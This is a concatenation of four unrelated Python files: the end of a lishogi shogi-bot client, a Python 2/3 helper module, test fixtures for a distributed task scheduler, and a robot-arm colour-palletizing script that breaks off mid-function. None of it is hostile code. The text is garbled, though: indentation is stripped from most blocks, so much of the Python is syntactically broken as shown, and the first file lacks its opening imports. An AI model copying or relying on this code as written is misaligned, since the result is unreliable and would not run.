from util import switchusiuci
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.6.0"
terminated = False
def signal_handler(signal, frame):
global terminated
logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
logger.info("start")
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode('utf-8'))
control_queue.put_nowait(event)
logger.info(event)
        except:
            logger.exception("Exception while reading the event stream; retrying")
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
max_games = challenge_config.get("concurrency", 1)
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
control_queue=multiprocessing.Manager().Queue()
control_stream = Process(target=watch_control_stream, args=[control_queue,li])
control_stream.start()
gamesip=[]
while not terminated:
event=control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "challenge":
logger.info("chlng detected")
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
logger.info("chlng supported")
try:
logger.info(" Accept {}".format(chlng))
response = li.accept_challenge(chlng.id)
logger.info(chlng.id)
except (HTTPError, ReadTimeout) as exception:
if isinstance(exception, HTTPError) and exception.response.status_code == 404: # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except:
pass
elif event["type"] == "gameStart":
logger.info("game detected")
game_id = event["game"]["id"]
gamesip.append(threading.Thread(target=play_game,args=(li, game_id, engine_factory, user_profile, config,)))
gamesip[-1].start()
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, engine_factory, user_profile, config):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
bullet=False
#Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode('utf-8'))
game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
board = setup_board(game)
cfg = config["engine"]
engineeng = engine_factory(board)
logger.info("+++ {}".format(game))
if is_engine_move(game,board.move_stack) and not is_game_over(game):
move=engineeng.search(board,5000,5000,1,1)
finalmove=switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
while not terminated:
try:
binary_chunk = next(lines)
except(StopIteration):
break
upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if not board.is_game_over():
if u_type == "gameState":
game.state=upd
moves = upd["moves"].split()
board = update_board(board, moves[-1])
if not is_game_over(game) and is_engine_move(game, moves):
move=engineeng.search(board,upd['wtime'],upd['btime'],upd['winc'],upd['binc'])
finalmove=switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
if board.turn == shogi.BLACK:
game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
else:
game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
else:
logger.info("game over")
engineeng.quit()
break
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def setup_board(game):
if game.variant_name == "From Position":
board = shogi.Board(makesfenfromfen(game.initial_fen))
else:
board = shogi.Board() # Standard
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def is_game_over(game):
return game.state["status"] != "started"
def update_board(board, move):
usi_move = shogi.Move.from_usi(makeusi(move))
if board.is_legal(usi_move):
board.push(usi_move)
else:
logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
return board
def intro():
return r"""
. _/\_
. //o o\\
. || || lishogi-bot %s
. || ||
. ||____|| Play on Lishogi with a bot
""" % __version__
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
format="%(asctime)-15s: %(message)s")
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
common.py
|
# -*- coding: utf-8 -*-
import json, subprocess, threading, sys, platform, os
PY3 = sys.version_info[0] == 3
JsonLoads = PY3 and json.loads or (lambda s: encJson(json.loads(s)))
JsonDumps = json.dumps
def STR2BYTES(s):
return s.encode('utf8') if PY3 else s
def BYTES2STR(b):
return b.decode('utf8') if PY3 else b
def BYTES2SYSTEMSTR(b):
return b.decode('utf8') if PY3 else \
b.decode('utf8').encode(sys.stdin.encoding)
def STR2SYSTEMSTR(s):
return s if PY3 else s.decode('utf8').encode(sys.stdin.encoding)
#def STRING_ESCAPE(s):
# if not PY3:
# return s.decode('string-escape')
# else:
# return s.encode('utf8').decode('unicode_escape')
if not PY3:
def encJson(obj):
if hasattr(obj, 'encode'):
return obj.encode('utf8')
elif isinstance(obj, list):
return [encJson(e) for e in obj]
elif isinstance(obj, dict):
return dict((encJson(k), encJson(v)) for k,v in obj.items())
else:
return obj
def Partition(msg, n):
n = n * 3
if n >= len(msg):
return msg, ''
else:
# All utf8 characters start with '0xxx-xxxx' or '11xx-xxxx'
while n > 0 and ord(msg[n]) >> 6 == 2:
n -= 1
return msg[:n], msg[n:]
else:
def Partition(msg, n):
return msg[:n], msg[n:]
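# Illustrative usage sketch (not part of the original code): Partition()
# bounds the first piece of a message. Under Python 3 it splits after n
# characters; under Python 2 it splits after roughly n*3 utf8 bytes, backing
# up so that a multi-byte character is never cut in half.
def PartitionExample():
    head, tail = Partition('hello world', 5)  # ('hello', ' world') on Python 3
    return head, tail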
#_p = re.compile(r'[0-9]+|[a-zA-Z][a-z]*')
#
#def SplitWords(s):
# return _p.findall(s)
#
#def MinusSeperate(s):
# return '-'.join(SplitWords(s)).lower()
def HasCommand(procName):
return subprocess.call(['which', procName], stdout=subprocess.PIPE) == 0
#def StartThread(target, *args, **kwargs):
# threading.Thread(target=target, args=args, kwargs=kwargs).start()
def StartDaemonThread(target, *args, **kwargs):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class LockedValue(object):
def __init__(self, initialVal=None):
self.val = initialVal
self.lock = threading.Lock()
def setVal(self, val):
with self.lock:
self.val = val
def getVal(self):
with self.lock:
val = self.val
return val
# usage: CallInNewConsole(['python', 'qterm.py'])
def CallInNewConsole(args=None):
args = sys.argv[1:] if args is None else args
if not args:
return 1
osName = platform.system()
if osName == 'Windows':
return subprocess.call(['start'] + list(args), shell=True)
elif osName == 'Linux':
cmd = subprocess.list2cmdline(args)
if HasCommand('mate-terminal'):
args = ['mate-terminal', '-e', cmd]
elif HasCommand('gnome-terminal'):
args = ['gnome-terminal', '-e', cmd]
elif HasCommand('xterm'):
args = ['sh', '-c', 'xterm -e %s &' % cmd]
else:
return 1
# args = ['sh', '-c', 'nohup %s >/dev/null 2>&1 &' % cmd]
return subprocess.call(args, preexec_fn=os.setpgrp)
elif osName == 'Darwin':
return subprocess.call(['open','-W','-a','Terminal.app'] + list(args))
else:
return 1
# return subprocess.Popen(list(args) + ['&'])
if PY3:
import queue as Queue
else:
import Queue
class DotDict(object):
def __init__(self, **kw):
self.__dict__.update(**kw)
Pass = lambda *arg, **kwargs: None
def LeftTrim(s, head):
if s.startswith(head):
        return s[len(head):]
else:
return s
def AutoTest():
with open(sys.argv[1], 'rb') as f:
for line in f.read().split(b'\n'):
line = BYTES2SYSTEMSTR(line.strip())
if not line:
continue
elif line.startswith('#'):
print(line)
else:
print('>>> '+line)
os.system(line)
sys.stdout.write('\npress enter to continue...')
if PY3:
input()
else:
raw_input()
sys.stdout.write('\n')
if not PY3:
import HTMLParser; htmlUnescape = HTMLParser.HTMLParser().unescape
def HTMLUnescape(s):
s = s.replace(' ', ' ')
return htmlUnescape(s.decode('utf8')).encode('utf8')
else:
import html.parser; htmlUnescape = html.parser.HTMLParser().unescape
def HTMLUnescape(s):
return htmlUnescape(s.replace(' ', ' '))
def IsMainThread():
return threading.current_thread().name == 'MainThread'
if PY3:
import importlib
reload = importlib.reload
# import module / import package.module
# Import('module') / Import('package.module')
def Import(moduleName):
if moduleName in sys.modules:
reload(sys.modules[moduleName])
else:
__import__(moduleName)
return sys.modules[moduleName]
if not PY3:
import urllib
Unquote = urllib.unquote
else:
import urllib.parse
Unquote = urllib.parse.unquote
|
utils_test.py
|
from __future__ import print_function, division, absolute_import
from contextlib import contextmanager
from glob import glob
import logging
from multiprocessing import Process, Queue
import os
import shutil
import signal
import socket
from subprocess import Popen, PIPE
import sys
from time import time, sleep
import uuid
from toolz import merge
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.iostream import StreamClosedError
from .core import connect, read, write, rpc
from .utils import ignoring, log_errors, sync
import pytest
logger = logging.getLogger(__name__)
@pytest.yield_fixture
def current_loop():
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
yield loop
if loop._running:
sync(loop, loop.stop)
for i in range(5):
try:
loop.close(all_fds=True)
return
except Exception as e:
f = e
print(f)
IOLoop.clear_instance()
@pytest.yield_fixture
def loop():
loop = IOLoop()
yield loop
if loop._running:
sync(loop, loop.stop)
for i in range(5):
try:
loop.close(all_fds=True)
return
except Exception as e:
f = e
print(f)
def inc(x):
return x + 1
def dec(x):
return x - 1
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise Exception('hello!')
def double(x):
return x * 2
def slowinc(x, delay=0.02):
from time import sleep
sleep(delay)
return x + 1
def randominc(x, scale=1):
from time import sleep
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y):
from time import sleep
sleep(0.02)
return x + y
def run_center(q):
from distributed import Center
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
# IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
center = Center('127.0.0.1')
while True:
try:
center.listen(0)
break
except Exception as e:
logging.info("Could not start center on port. Retrying",
exc_info=True)
q.put(center.port)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_scheduler(q, scheduler_port=0, center_port=None, **kwargs):
from distributed import Scheduler
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
center = ('127.0.0.1', center_port) if center_port else None
scheduler = Scheduler(center=center, loop=loop, **kwargs)
done = scheduler.start(scheduler_port)
q.put(scheduler.port)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_worker(q, center_port, **kwargs):
from distributed import Worker
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
with log_errors():
IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
worker = Worker('127.0.0.1', center_port, ip='127.0.0.1', loop=loop, **kwargs)
loop.run_sync(lambda: worker._start(0))
q.put(worker.port)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_nanny(q, center_port, **kwargs):
from distributed import Nanny
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
with log_errors():
IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
worker = Nanny('127.0.0.1', center_port, ip='127.0.0.1', loop=loop, **kwargs)
loop.run_sync(lambda: worker._start(0))
q.put(worker.port)
try:
loop.start()
finally:
loop.run_sync(worker._close)
loop.close(all_fds=True)
@contextmanager
def cluster(nworkers=2, nanny=False, worker_kwargs={}):
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
scheduler_q = Queue()
scheduler = Process(target=run_scheduler, args=(scheduler_q,))
scheduler.daemon = True
scheduler.start()
sport = scheduler_q.get()
workers = []
for i in range(nworkers):
q = Queue()
fn = '_test_worker-%s' % uuid.uuid1()
proc = Process(target=_run_worker, args=(q, sport),
kwargs=merge({'ncores': 1, 'local_dir': fn},
worker_kwargs))
workers.append({'proc': proc, 'queue': q, 'dir': fn})
for worker in workers:
worker['proc'].start()
for worker in workers:
worker['port'] = worker['queue'].get()
loop = IOLoop()
s = rpc(ip='127.0.0.1', port=sport)
start = time()
try:
while True:
ncores = loop.run_sync(s.ncores)
if len(ncores) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
yield {'proc': scheduler, 'port': sport}, workers
finally:
logger.debug("Closing out test cluster")
with ignoring(socket.error, TimeoutError, StreamClosedError):
loop.run_sync(lambda: disconnect('127.0.0.1', sport), timeout=0.5)
scheduler.terminate()
scheduler.join(timeout=2)
for port in [w['port'] for w in workers]:
with ignoring(socket.error, TimeoutError, StreamClosedError):
loop.run_sync(lambda: disconnect('127.0.0.1', port),
timeout=0.5)
for proc in [w['proc'] for w in workers]:
with ignoring(Exception):
proc.terminate()
proc.join(timeout=2)
for q in [w['queue'] for w in workers]:
q.close()
for fn in glob('_test_worker-*'):
shutil.rmtree(fn)
loop.close(all_fds=True)
@contextmanager
def cluster_center(nworkers=2, nanny=False):
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
center_q = Queue()
center = Process(target=run_center, args=(center_q,))
center.daemon = True
center.start()
cport = center_q.get()
workers = []
for i in range(nworkers):
q = Queue()
fn = '_test_worker-%s' % uuid.uuid1()
proc = Process(target=_run_worker, args=(q, cport),
kwargs={'ncores': 1, 'local_dir': fn})
workers.append({'proc': proc, 'queue': q, 'dir': fn})
for worker in workers:
worker['proc'].start()
for worker in workers:
worker['port'] = worker['queue'].get()
loop = IOLoop()
c = rpc(ip='127.0.0.1', port=cport)
start = time()
try:
while True:
ncores = loop.run_sync(c.ncores)
if len(ncores) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
yield {'proc': center, 'port': cport}, workers
finally:
logger.debug("Closing out test cluster")
for port in [cport] + [w['port'] for w in workers]:
with ignoring(socket.error, TimeoutError, StreamClosedError):
loop.run_sync(lambda: disconnect('127.0.0.1', port),
timeout=0.5)
for proc in [center] + [w['proc'] for w in workers]:
with ignoring(Exception):
proc.terminate()
for proc in [center] + [w['proc'] for w in workers]:
with ignoring(Exception):
proc.join(timeout=5)
for fn in glob('_test_worker-*'):
shutil.rmtree(fn)
@gen.coroutine
def disconnect(ip, port):
stream = yield connect(ip, port)
try:
yield write(stream, {'op': 'terminate', 'close': True})
response = yield read(stream)
finally:
stream.close()
import pytest
try:
slow = pytest.mark.skipif(
not pytest.config.getoption("--runslow"),
reason="need --runslow option to run")
except AttributeError:
def slow(*args):
pass
from tornado import gen
from tornado.ioloop import IOLoop
def _test_cluster(f, loop=None, b_ip='127.0.0.1'):
from .center import Center
from .worker import Worker
from .executor import _global_executor
@gen.coroutine
def g():
c = Center('127.0.0.1')
c.listen(0)
a = Worker(c.ip, c.port, ncores=2, ip='127.0.0.1')
yield a._start()
b = Worker(c.ip, c.port, ncores=1, ip=b_ip)
yield b._start()
start = time()
try:
while len(c.ncores) < 2:
yield gen.sleep(0.01)
if time() - start > 5:
raise Exception("Cluster creation timeout")
yield f(c, a, b)
except Exception as e:
logger.exception(e)
raise
finally:
logger.debug("Closing out test cluster")
for w in [a, b]:
with ignoring(TimeoutError, StreamClosedError, OSError):
yield w._close()
if os.path.exists(w.local_dir):
shutil.rmtree(w.local_dir)
c.stop()
loop = loop or IOLoop.current()
loop.run_sync(g)
_global_executor[0] = None
def _test_scheduler(f, loop=None, b_ip='127.0.0.1'):
from .scheduler import Scheduler
from .worker import Worker
from .executor import _global_executor
@gen.coroutine
def g():
s = Scheduler(ip='127.0.0.1')
done = s.start(0)
a = Worker('127.0.0.1', s.port, ncores=2, ip='127.0.0.1')
yield a._start()
b = Worker('127.0.0.1', s.port, ncores=1, ip=b_ip)
yield b._start()
start = time()
try:
while len(s.ncores) < 2:
yield gen.sleep(0.01)
if time() - start > 5:
raise Exception("Cluster creation timeout")
yield f(s, a, b)
finally:
logger.debug("Closing out test cluster")
yield s.close()
for w in [a, b]:
with ignoring(TimeoutError, StreamClosedError, OSError):
yield w._close()
if os.path.exists(w.local_dir):
shutil.rmtree(w.local_dir)
loop = loop or IOLoop.current()
loop.run_sync(g)
_global_executor[0] = None
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
def test_foo():
yield ... # use tornado coroutines
"""
def _(func):
def test_func():
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
cor = gen.coroutine(func)
try:
loop.run_sync(cor, timeout=timeout)
finally:
loop.stop()
loop.close(all_fds=True)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
from .executor import Executor
@gen.coroutine
def start_cluster(ncores, loop, Worker=Worker):
s = Scheduler(ip='127.0.0.1', loop=loop)
done = s.start(0)
workers = [Worker(s.ip, s.port, ncores=v, ip=k, name=i, loop=loop)
for i, (k, v) in enumerate(ncores)]
yield [w._start() for w in workers]
start = time()
while len(s.ncores) < len(ncores):
yield gen.sleep(0.01)
if time() - start > 5:
raise Exception("Cluster creation timeout")
raise gen.Return((s, workers))
@gen.coroutine
def end_cluster(s, workers):
logger.debug("Closing out test cluster")
for w in workers:
with ignoring(TimeoutError, StreamClosedError, OSError):
yield w._close(report=False)
if w.local_dir and os.path.exists(w.local_dir):
shutil.rmtree(w.local_dir)
s.stop()
def gen_cluster(ncores=[('127.0.0.1', 1), ('127.0.0.1', 2)], timeout=10,
Worker=Worker, executor=False):
from distributed import Executor
""" Coroutine test with small cluster
@gen_cluster()
def test_foo(scheduler, worker1, worker2):
yield ... # use tornado coroutines
See also:
start
end
"""
def _(func):
cor = gen.coroutine(func)
def test_func():
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
s, workers = loop.run_sync(lambda: start_cluster(ncores, loop,
Worker=Worker))
args = [s] + workers
if executor:
e = Executor((s.ip, s.port), loop=loop, start=False)
loop.run_sync(e._start)
args = [e] + args
try:
loop.run_sync(lambda: cor(*args), timeout=timeout)
finally:
if executor:
loop.run_sync(e._shutdown)
loop.run_sync(lambda: end_cluster(s, workers))
loop.stop()
loop.close(all_fds=True)
return test_func
return _
@contextmanager
def make_hdfs():
from hdfs3 import HDFileSystem
hdfs = HDFileSystem(host='localhost', port=8020)
if hdfs.exists('/tmp/test'):
hdfs.rm('/tmp/test')
hdfs.mkdir('/tmp/test')
try:
yield hdfs
finally:
if hdfs.exists('/tmp/test'):
hdfs.rm('/tmp/test')
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
@contextmanager
def popen(*args, **kwargs):
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
proc = Popen(*args, **kwargs)
try:
yield proc
finally:
os.kill(proc.pid, signal.SIGINT)
if sys.version_info[0] == 3:
proc.wait(5)
else:
proc.wait()
with ignoring(OSError):
proc.terminate()
|
ColorPalletizing.py
|
#!/usr/bin/python3
# coding=utf8
import sys
sys.path.append('/home/pi/ArmPi/')
import cv2
import time
import Camera
import threading
from LABConfig import *
from ArmIK.Transform import *
from ArmIK.ArmMoveIK import *
import HiwonderSDK.Board as Board
from CameraCalibration.CalibrationConfig import *
if sys.version_info.major == 2:
print('Please run this program with python3!')
sys.exit(0)
AK = ArmIK()
range_rgb = {
'red': (0, 0, 255),
'blue': (255, 0, 0),
'green': (0, 255, 0),
'black': (0, 0, 0),
'white': (255, 255, 255),
}
__target_color = ('red', 'green', 'blue')
def setTargetColor(target_color):
global __target_color
#print("COLOR", target_color)
__target_color = target_color
return (True, ())
# Find the contour with the largest area
# The argument is a list of contours to compare
def getAreaMaxContour(contours):
contour_area_temp = 0
contour_area_max = 0
area_max_contour = None
    for c in contours:  # iterate over all contours
        contour_area_temp = math.fabs(cv2.contourArea(c))  # compute the contour area
        if contour_area_temp > contour_area_max:
            contour_area_max = contour_area_temp
            if contour_area_temp > 300:  # only contours with area greater than 300 are valid, to filter out noise
                area_max_contour = c
    return area_max_contour, contour_area_max  # return the largest contour and its area
# servo pulse at which the gripper is closed when grasping
servo1 = 500
# initial position
def initMove():
Board.setBusServoPulse(1, servo1 - 50, 300)
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
def setBuzzer(timer):
Board.setBuzzer(0)
Board.setBuzzer(1)
time.sleep(timer)
Board.setBuzzer(0)
# Set the RGB LED color on the expansion board to match the color being tracked
def set_rgb(color):
if color == "red":
Board.RGB.setPixelColor(0, Board.PixelColor(255, 0, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(255, 0, 0))
Board.RGB.show()
elif color == "green":
Board.RGB.setPixelColor(0, Board.PixelColor(0, 255, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 255, 0))
Board.RGB.show()
elif color == "blue":
Board.RGB.setPixelColor(0, Board.PixelColor(0, 0, 255))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 0, 255))
Board.RGB.show()
else:
Board.RGB.setPixelColor(0, Board.PixelColor(0, 0, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 0, 0))
Board.RGB.show()
count = 0
_stop = False
color_list = []
get_roi = False
__isRunning = False
move_square = False
detect_color = 'None'
start_pick_up = False
start_count_t1 = True
# placement coordinates
coordinate = {
'red': (-15 + 1, -7 - 0.5, 1.5),
'green': (-15 + 1, -7 - 0.5, 1.5),
'blue': (-15 + 1, -7 - 0.5, 1.5),
}
z_r = coordinate['red'][2]
z_g = coordinate['green'][2]
z_b = coordinate['blue'][2]
z = z_r
def reset():
global _stop
global count
global get_roi
global color_list
global move_square
global detect_color
global start_pick_up
global start_count_t1
global z_r, z_g, z_b, z
count = 0
_stop = False
color_list = []
get_roi = False
move_square = False
detect_color = 'None'
start_pick_up = False
start_count_t1 = True
z_r = coordinate['red'][2]
z_g = coordinate['green'][2]
z_b = coordinate['blue'][2]
z = z_r
def init():
print("ColorPalletizing Init")
initMove()
def start():
global __isRunning
reset()
__isRunning = True
print("ColorPalletizing Start")
def stop():
global _stop
global __isRunning
_stop = True
__isRunning = False
print("ColorPalletizing Stop")
def exit():
global _stop
global __isRunning
_stop = True
__isRunning = False
print("ColorPalletizing Exit")
rect = None
size = (640, 480)
rotation_angle = 0
unreachable = False
world_X, world_Y = 0, 0
def move():
global rect
global _stop
global get_roi
global move_square
global __isRunning
global unreachable
global detect_color
global start_pick_up
global rotation_angle
global world_X, world_Y
global z_r, z_g, z_b, z
dz = 2.5
while True:
if __isRunning:
            if detect_color != 'None' and start_pick_up:  # if a detected block has stopped moving for a while, start picking it up
set_rgb(detect_color)
setBuzzer(0.1)
                # accumulate the stacking height
z = z_r
z_r += dz
if z == 2 * dz + coordinate['red'][2]:
z_r = coordinate['red'][2]
if z == coordinate['red'][2]:
move_square = True
time.sleep(3)
move_square = False
                result = AK.setPitchRangeMoving((world_X, world_Y, 7), -90, -90, 0)  # move above the target position
if result == False:
unreachable = True
else:
unreachable = False
time.sleep(result[2]/1000)
if not __isRunning:
continue
                # compute the angle the gripper needs to rotate to
                servo2_angle = getAngle(world_X, world_Y, rotation_angle)
                Board.setBusServoPulse(1, servo1 - 280, 500)  # open the gripper
Board.setBusServoPulse(2, servo2_angle, 500)
time.sleep(0.5)
if not __isRunning:
continue
                AK.setPitchRangeMoving((world_X, world_Y, 2), -90, -90, 0, 1000)  # lower to a height of 2 cm
time.sleep(1.5)
if not __isRunning:
continue
                Board.setBusServoPulse(1, servo1, 500)  # close the gripper
time.sleep(0.8)
if not __isRunning:
continue
Board.setBusServoPulse(2, 500, 500)
                AK.setPitchRangeMoving((world_X, world_Y, 12), -90, -90, 0, 1000)  # raise the arm
time.sleep(1)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0, 1500)
time.sleep(1.5)
if not __isRunning:
continue
servo2_angle = getAngle(coordinate[detect_color][0], coordinate[detect_color][1], -90)
Board.setBusServoPulse(2, servo2_angle, 500)
time.sleep(0.5)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], z + 3), -90, -90, 0, 500)
time.sleep(0.5)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], z), -90, -90, 0, 1000)
time.sleep(0.8)
if not __isRunning:
continue
                Board.setBusServoPulse(1, servo1 - 200, 500)  # open the gripper and release the object
time.sleep(1)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0, 800)
time.sleep(0.8)
                initMove()  # return to the initial position
time.sleep(1.5)
detect_color = 'None'
get_roi = False
start_pick_up = False
set_rgb(detect_color)
else:
if _stop:
_stop = False
Board.setBusServoPulse(1, servo1 - 70, 300)
time.sleep(0.5)
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
time.sleep(1.5)
time.sleep(0.01)
# start the motion worker thread
th = threading.Thread(target=move)
th.setDaemon(True)
th.start()
t1 = 0
roi = ()
center_list = []
last_x, last_y = 0, 0
draw_color = range_rgb["black"]
def run(img):
global roi
global rect
global count
global get_roi
global move_square
global center_list
global unreachable
global __isRunning
global start_pick_up
global last_x, last_y
global rotation_angle
global world_X, world_Y
global start_count_t1, t1
global detect_color, draw_color, color_list
img_copy = img.copy()
img_h, img_w = img.shape[:2]
cv2.line(img, (0, int(img_h / 2)), (img_w, int(img_h / 2)), (0, 0, 200), 1)
cv2.line(img, (int(img_w / 2), 0), (int(img_w / 2), img_h), (0, 0, 200), 1)
if not __isRunning:
return img
frame_resize = cv2.resize(img_copy, size, interpolation=cv2.INTER_NEAREST)
frame_gb = cv2.GaussianBlur(frame_resize, (11, 11), 11)
    # if an object was detected in some region, keep checking that region until it is gone
if get_roi and not start_pick_up:
get_roi = False
frame_gb = getMaskROI(frame_gb, roi, size)
    frame_lab = cv2.cvtColor(frame_gb, cv2.COLOR_BGR2LAB)  # convert the image to LAB color space
color_area_max = None
max_area = 0
areaMaxContour_max = 0
if not start_pick_up:
for i in color_range:
if i in __target_color:
                frame_mask = cv2.inRange(frame_lab, color_range[i][0], color_range[i][1])  # mask the pixels inside this color's LAB range
                opened = cv2.morphologyEx(frame_mask, cv2.MORPH_OPEN, np.ones((6, 6), np.uint8))  # morphological opening to remove noise
                closed = cv2.morphologyEx(opened, cv2.MORPH_CLOSE, np.ones((6, 6), np.uint8))  # morphological closing to fill holes
                contours = cv2.findContours(closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2]  # find the outer contours
                areaMaxContour, area_max = getAreaMaxContour(contours)  # pick the largest contour
if areaMaxContour is not None:
if area_max > max_area: # 找最大面积
max_area = area_max
color_area_max = i
areaMaxContour_max = areaMaxContour
        if max_area > 2500:  # a sufficiently large area was found
rect = cv2.minAreaRect(areaMaxContour_max)
box = np.int0(cv2.boxPoints(rect))
            roi = getROI(box)  # get the ROI region
get_roi = True
            img_centerx, img_centery = getCenter(rect, roi, size, square_length)  # get the center of the block in image coordinates
            world_x, world_y = convertCoordinate(img_centerx, img_centery, size)  # convert to real-world coordinates
if not start_pick_up:
cv2.drawContours(img, [box], -1, range_rgb[color_area_max], 2)
                cv2.putText(img, '(' + str(world_x) + ',' + str(world_y) + ')', (min(box[0, 0], box[2, 0]), box[2, 1] - 10),
                            cv2.FONT_HERSHEY_SIMPLEX, 0.5, range_rgb[color_area_max], 1)  # label the block with its world coordinates
            distance = math.sqrt(pow(world_x - last_x, 2) + pow(world_y - last_y, 2))  # compare with the last position to judge whether the block has moved
last_x, last_y = world_x, world_y
if not start_pick_up:
                if color_area_max == 'red':  # red has the largest area
                    color = 1
                elif color_area_max == 'green':  # green has the largest area
                    color = 2
                elif color_area_max == 'blue':  # blue has the largest area
                    color = 3
else:
color = 0
color_list.append(color)
                # accumulate detections across frames
if distance < 0.5:
count += 1
center_list.extend((world_x, world_y))
if start_count_t1:
start_count_t1 = False
t1 = time.time()
if time.time() - t1 > 0.5:
rotation_angle = rect[2]
start_count_t1 = True
world_X, world_Y = np.mean(np.array(center_list).reshape(count, 2), axis=0)
center_list = []
count = 0
start_pick_up = True
else:
t1 = time.time()
start_count_t1 = True
center_list = []
count = 0
                if len(color_list) == 3:  # vote over several frames
                    # take the average color index
color = int(round(np.mean(np.array(color_list))))
color_list = []
if color == 1:
detect_color = 'red'
